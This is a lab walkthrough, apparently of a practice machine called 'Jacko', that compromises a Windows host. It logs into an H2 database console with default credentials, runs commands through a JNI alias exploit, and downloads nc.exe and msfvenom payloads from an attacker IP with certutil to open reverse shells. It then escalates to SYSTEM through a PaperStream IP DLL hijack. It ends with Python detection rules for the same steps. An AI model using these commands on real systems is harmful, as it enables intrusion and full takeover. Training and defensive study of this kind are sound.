Nmap scan
# Nmap 7.94 scan initiated Thu Oct 5 23:02:59 2023 as: nmap -sV -sC -oA jacko -Pn 192.168.180.66
Nmap scan report for 192.168.180.66
Host is up (0.28s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: H2 Database Engine (redirect)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
8082/tcp open http H2 database http console
|_http-title: H2 Console
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-10-06T03:03:48
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Oct 5 23:04:26 2023 -- 1 IP address (1 host up) scanned in 87.60 seconds
Checking the two low-hanging fruit, ports 80 and 8082.
http://192.168.180.66:8082/ gives us the H2 Database Engine console with a login form and the username "Sa" prefilled. 192.168.180.66:80 just gives us a page with H2 database information.
Googling for H2 Database Engine default creds turns up the following (from Stack Overflow):
name = "sa"
password = ""
Logging in with a blank password works and we are in.
In the console tree we can see the connection and the version:
jdbc:h2:~/test
INFORMATION_SCHEMA
Users
H2 1.4.199 (2019-03-13)
Checking searchsploit:
─$ searchsploit H2
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service (PoC) | windows/dos/48010.py
Adobe Flash - H264 File Stack Corruption | multiple/dos/39466.txt
Adobe Flash - H264 Parsing Out-of-Bounds Read | multiple/dos/39464.txt
Buffalo WZR-HP-G300NH2 - Cross-Site Request Forgery | hardware/webapps/26129.txt
freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Remote Denial of Service | linux/dos/31218.txt
Google Android - 'ih264d_process_intra_mb' Memory Corruption | android/dos/39651.txt
H2 Database - 'Alias' Arbitrary Code Execution | java/local/44422.py
H2 Database 1.4.196 - Remote Code Execution | java/webapps/45506.py
H2 Database 1.4.197 - Information Disclosure | linux/webapps/45105.py
H2 Database 1.4.199 - JNI Code Execution | java/local/49384.txt
H264WebCam - Boundary Condition Error | windows/dos/13920.c
H2O-CMS 3.4 - Insecure Cookie Handling | php/webapps/6862.txt
H2O-CMS 3.4 - PHP Code Injection / Cookie Authentication Bypass | php/webapps/32540.pl
H2O-CMS 3.4 - Remote Command Execution | php/webapps/6861.pl
Heathco Software h2desk - Multiple Information Disclosure Vulnerabilities | php/webapps/31321.txt
Netgear SPH200D - Multiple Vulnerabilities | hardware/webapps/24441.txt
Netscape iCal 2.1 Patch2 - iPlanet iCal 'csstart' Local Privilege Escalation | solaris/local/20276.sh
Netscape iCal 2.1 Patch2 - iPlanet iCal 'iplncal.sh' Permissions | solaris/local/20275.sh
SSH2 3.0 - Restricted Shell Escape (Command Execution) | linux/local/21398.txt
SSH2 3.0 - Short Password Login | unix/remote/21021.pl
WebRTC - H264 NAL Packet Processing Type Confusion | multiple/dos/45123.txt
Windows 11 22h2 - Kernel Privilege Elevation | windows/local/51544.c
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcode Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Windows/x64 - Bind (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes) | windows_x86-64/40981.c
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
╭─kali@kali ~/PG/jacko
╰─$ searchsploit -m java/local/49384.txt
Exploit: H2 Database 1.4.199 - JNI Code Execution
URL: https://www.exploit-db.com/exploits/49384
Path: /usr/share/exploitdb/exploits/java/local/49384.txt
Codes: N/A
Verified: True
File Type: ASCII text, with very long lines (64895)
Copied to: /home/kali/PG/jacko/49384.txt
Checking Exploit-DB, we find the same verified exploit: https://www.exploit-db.com/exploits/49384
After executing the three steps from the exploit, we find that the final call executes whoami:
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\Z").next()');
jacko\tony
Next we will create a reverse shell payload, upload it to the machine with certutil, and run it.
First we will try a reverse shell with netcat.
╭─kali@kali ~/PG/jacko
╰─$ locate nc.exe
/home/kali/HTB/resolute/nc.exe
/usr/share/windows-resources/binaries/nc.exe
╭─kali@kali ~/PG/jacko
╰─$ cp /home/kali/HTB/resolute/nc.exe ~/exe
╭─kali@kali ~/PG/jacko
╰─$ cd ~/exe
╭─kali@kali ~/exe
╰─$ serve 80
Starting HTTP server on port 80...
====================================
certutil -urlcache -f http://192.168.45.236:80/file_to_download.txt C:\path\where\you\lile.txt
Invoke-WebRequest -Uri http://192.168.45.236:80/file_to_download.txt -OutFile C:\path\lile.txt
====================================
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
We do it by running the following two commands through the H2 alias, and we get a prompt:
certutil -urlcache -split -f http://192.168.45.236:80/nc.exe c:/windows/temp/nc.exe
c:/windows/temp/nc.exe 192.168.45.236 8082 -e cmd.exe
192.168.180.66 - - [06/Oct/2023 20:36:57] "GET /nc.exe HTTP/1.1" 200 -
192.168.180.66 - - [06/Oct/2023 20:36:58] "GET /nc.exe HTTP/1.1" 200 -
192.168.180.66 - - [06/Oct/2023 20:42:04] "GET /nc.exe HTTP/1.1" 200 -
192.168.180.66 - - [06/Oct/2023 20:42:05] "GET /nc.exe HTTP/1.1" 200 -
And on the listener side:
C:\Program Files (x86)\H2\service>^C
╭─kali@kali ~/exe
╰─$ rev 8082 1 ↵
Starting reverse shell listener on IP 192.168.45.236 and port 8082...
====================================
To upgrade a basic reverse shell (e.g., /bin/sh):
python -c 'import pty; pty.spawn("/bin/bash")'
====================================
listening on [any] 8082 ...
connect to [192.168.45.236] from (UNKNOWN) [192.168.180.66] 51507
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\H2\service>
We will repeat the above with a proper shell:
msfvenom
╭─kali@kali ~/exe
╰─$ cd ~/PG/jacko
╭─kali@kali ~/PG/jacko
╰─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.236 LPORT=8082 EXITFUNC=thread -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
certutil -urlcache -split -f http://192.168.45.236:80/shell.exe c:/windows/temp/shell.exe
c:/windows/temp/shell.exe
We get a shell:
Starting reverse shell listener on IP 192.168.45.236 and port 8082...
====================================
To upgrade a basic reverse shell (e.g., /bin/sh):
python -c 'import pty; pty.spawn("/bin/bash")'
====================================
listening on [any] 8082 ...
connect to [192.168.45.236] from (UNKNOWN) [192.168.180.66] 51544
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\H2\service>
Checking the directories in Program Files (x86):
Directory of C:\Program Files (x86)
04/27/2020 09:01 PM <DIR> .
04/27/2020 09:01 PM <DIR> ..
04/27/2020 08:59 PM <DIR> Common Files
04/27/2020 09:01 PM <DIR> fiScanner
04/27/2020 08:59 PM <DIR> H2
04/24/2020 09:50 AM <DIR> Internet Explorer
03/18/2019 09:52 PM <DIR> Microsoft.NET
04/27/2020 09:01 PM <DIR> PaperStream IP
03/18/2019 11:20 PM <DIR> Windows Defender
03/18/2019 09:52 PM <DIR> Windows Mail
04/24/2020 09:50 AM <DIR> Windows Media Player
03/18/2019 11:23 PM <DIR> Windows Multimedia Platform
03/18/2019 10:02 PM <DIR> Windows NT
03/18/2019 11:23 PM <DIR> Windows Photo Viewer
03/18/2019 11:23 PM <DIR> Windows Portable Devices
03/18/2019 09:52 PM <DIR> WindowsPowerShell
0 File(s) 0 bytes
16 Dir(s) 6,921,785,344 bytes free
C:\Program Files (x86)>
Out of the norm is PaperStream IP, so we check it out.
Enumerating to find a version, we find a readme file under TWAIN:
Directory of C:\Program Files (x86)\PaperStream IP\TWAIN
04/27/2020 09:01 PM <DIR> .
04/27/2020 09:01 PM <DIR> ..
01/28/2016 11:22 AM 11,658 Licenseenu.rtf
04/27/2020 09:01 PM <DIR> Profile
07/11/2016 06:32 PM 3,241,739 PSIP0401.chm
07/07/2016 03:40 AM 3,315,469 PSIP0404.chm
07/06/2016 10:41 PM 3,479,268 PSIP0407.chm
07/04/2016 11:51 PM 3,544,174 PSIP0409.chm
07/12/2016 12:59 AM 3,449,511 PSIP040A.chm
07/07/2016 01:13 AM 3,424,734 PSIP040C.chm
07/06/2016 04:55 PM 3,412,543 PSIP0410.chm
06/21/2016 09:13 PM 3,868,867 PSIP0411.chm
07/05/2016 11:21 PM 3,177,961 PSIP0412.chm
07/12/2016 05:21 PM 3,406,701 PSIP0416.chm
07/07/2016 02:19 AM 3,396,546 PSIP0419.chm
07/06/2016 11:21 PM 3,394,699 PSIP041F.chm
07/06/2016 05:33 PM 3,353,423 PSIP0804.chm
07/04/2016 02:00 PM 17,990 readmeenu.rtf
15 File(s) 44,495,283 bytes
3 Dir(s) 6,921,469,952 bytes free
C:\Program Files (x86)\PaperStream IP\TWAIN>
Opening the file, we find version 1.42:
C:\Program Files (x86)\PaperStream IP\TWAIN>type readmeenu.rtf
type readmeenu.rtf
{\rtf1\ansi\ansicpg932\deff0\deflang1033\deflangfe1041{\fonttbl{\f0\fnil\fcharset0 Microsoft Sans Serif;}{\f1\fswiss\fprq2\fcharset0 Microsoft Sans Serif;}}
{\colortbl ;\red0\green0\blue0;}
{\*\generator Msftedit 5.41.21.2510;}\viewkind4\uc1\pard\nowidctlpar\sl276\slmult1\f0\fs18 ---------------------------------------------------------------------------------------------------------\par
fi Series\par
PaperStream IP driver 1.42\par
README file\par
---------------------------------------------------------------------------------------------------------\par
Copyright PFU LIMITED 2013-2016\par
\par
\par
This file includes important notes on this product and also the additional information not included in the manuals.\par
\par
---------------------------------------------------------------------------------------------------------\par
Table of Contents\par
Checking searchsploit:
╰─$ searchsploit PaperStream IP
--------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------- ---------------------------------
PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation | windows/local/49382.ps1
--------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
╭─kali@kali ~/PG/jacko
╰─$
We check out the PowerShell file, and it looks like we have to generate a DLL called UninOldIS.dll containing a reverse shell.
msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.236 LPORT=8082 --platform=windows -f dll > UninOldIS.dll
╰─$ msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=8082 -f dll -o UninOldIS.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 9216 bytes
Saved as: UninOldIS.dll
╭─kali@kali ~/PG/jacko
Upload both this and the PowerShell script to the machine:
certutil -urlcache -split -f http://192.168.45.236:80/UninOldIS.dl c:/windows/temp/UninOldIS.dll
certutil -urlcache -split -f http://192.168.45.236:80/49382.ps1 c:/windows/temp/49382.ps1
Running the script via PowerShell:
C:\Program Files (x86)\H2\service>cd C:\Windows\System32\WindowsPowerShell\v1.0
cd C:\Windows\System32\WindowsPowerShell\v1.0
C:\Windows\System32\WindowsPowerShell\v1.0>powershell.exe -ep bypass
powershell.exe -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Windows\System32\WindowsPowerShell\v1.0> c:/windows/temp/49382.ps1 c:/windows/temp/UninOldIS.dll
c:/windows/temp/49382.ps1 c:/windows/temp/UninOldIS.dll
Writable location found, copying payload to C:\JavaTemp\
Payload copied, triggering...
Payload triggered
PS C:\Windows\System32\WindowsPowerShell\v1.0> cd c:/windows/temp/
cd c:/windows/temp/
PS C:\windows\temp> del UninOldIS.dll
del UninOldIS.dll
PS C:\windows\temp> Invoke-WebRequest -Uri http://192.168.45.236:80/UninOldIS.dll -OutFile c:\windows\temp\UninOldIS.dll
Invoke-WebRequest -Uri http://192.168.45.236:80/UninOldIS.dll -OutFile c:\windows\temp\UninOldIS.dll
PS C:\windows\temp> cd C:\Windows\System32\WindowsPowerShell\v1.0
cd C:\Windows\System32\WindowsPowerShell\v1.0
PS C:\Windows\System32\WindowsPowerShell\v1.0> c:/windows/temp/49382.ps1 c:/windows/temp/UninOldIS.dll
c:/windows/temp/49382.ps1 c:/windows/temp/UninOldIS.dll
Writable location found, copying payload to C:\JavaTemp\
And we get the reverse shell:
─$ nc -nlvp 8082
listening on [any] 8082 ...
^C
╭─kali@kali ~/PG/jacko
╰─$ nc -nlvp 8082 1 ↵
listening on [any] 8082 ...
connect to [192.168.45.236] from (UNKNOWN) [192.168.180.66] 51903
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
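As an added example from the defensive side (not part of the original notes): detection logic for the two chains above, the H2 alias/JNI command execution staged with certutil and nc.exe, and the PaperStream IP DLL drop into C:\JavaTemp\. It assumes Sysmon-style process-creation and file-creation telemetry flattened into constructed key=value lines; the field names, the sample lines and the rule names are assumptions.

```python
import re
# Assumption: Sysmon-like telemetry (EventID 1 = process create, 11 = file create) flattened
# into constructed "Key=value|Key=value" lines; field names are assumptions, not a real format.
H2_SERVICE_DIR = r"c:\program files (x86)\h2\service"  # cwd of every shell in the writeup
HIJACK_DIR = "c:\\javatemp\\"  # writable dir the PaperStream LPE script copies its DLL into
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "whoami.exe", "certutil.exe", "nc.exe"}
DOWNLOADER = re.compile(r"certutil(\.exe)?\s.*-urlcache|invoke-webrequest", re.I)
NC_EXEC = re.compile(r"\s-e\s+cmd(\.exe)?", re.I)

def parse(line):
    """Split one constructed 'Key=value|Key=value' line into a dict."""
    return {k.strip(): v.strip() for k, v in (f.split("=", 1) for f in line.split("|"))}

def classify(ev):
    """Return the names of the rules one parsed event matches (empty list = nothing fired)."""
    findings = []
    if ev.get("EventID") == "1":
        parent = ev.get("ParentImage", "").lower()
        cwd = ev.get("CurrentDirectory", "").lower()
        image = ev.get("Image", "").lower().rsplit("\\", 1)[-1]
        cmd = ev.get("CommandLine", "")
        # The alias/JNI trick runs OS commands from inside the database JVM, so a shell or
        # LOLBin whose parent or working directory is the H2 service is the first signal.
        in_h2 = parent.startswith(H2_SERVICE_DIR) or cwd.startswith(H2_SERVICE_DIR)
        if image in SUSPICIOUS_CHILDREN and in_h2:
            findings.append("h2-service-child-process")
        if DOWNLOADER.search(cmd):
            findings.append("lolbin-download")  # certutil -urlcache / Invoke-WebRequest staging
        if image == "nc.exe" and NC_EXEC.search(cmd):
            findings.append("netcat-reverse-shell")  # nc.exe <ip> <port> -e cmd.exe
    elif ev.get("EventID") == "11":
        target = ev.get("TargetFilename", "").lower()
        if target.startswith(HIJACK_DIR) and target.endswith(".dll"):
            findings.append("dll-dropped-in-javatemp")  # PaperStream IP 1.42 hijack staging
    return findings

def scan(lines):
    """Map line index -> findings for every line on which at least one rule fired."""
    return {i: f for i, f in ((i, classify(parse(l))) for i, l in enumerate(lines)) if f}

H2 = "C:\\Program Files (x86)\\H2\\service\\"
# Constructed sample telemetry mirroring the writeup's steps (not real logs).
SAMPLE_EVENTS = [
    f"EventID=1|Image=C:\\Windows\\System32\\cmd.exe|ParentImage={H2}java.exe|CurrentDirectory={H2}|CommandLine=cmd.exe /c whoami",
    f"EventID=1|Image=C:\\Windows\\System32\\certutil.exe|ParentImage=C:\\Windows\\System32\\cmd.exe|CurrentDirectory={H2}"
    "|CommandLine=certutil -urlcache -split -f http://192.168.45.236:80/nc.exe c:/windows/temp/nc.exe",
    f"EventID=1|Image=C:\\windows\\temp\\nc.exe|ParentImage=C:\\Windows\\System32\\cmd.exe|CurrentDirectory={H2}"
    "|CommandLine=c:/windows/temp/nc.exe 192.168.45.236 8082 -e cmd.exe",
    "EventID=11|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|TargetFilename=C:\\JavaTemp\\UninOldIS.dll",
    "EventID=1|Image=C:\\Windows\\System32\\svchost.exe|ParentImage=C:\\Windows\\System32\\services.exe|CurrentDirectory=C:\\Windows\\system32\\|CommandLine=svchost.exe -k netsvcs",
]
```

Running `scan(SAMPLE_EVENTS)` flags the first four constructed events and leaves the benign svchost line alone; in practice the H2 rule alone is enough to catch the alias trick even when the operator changes the tooling.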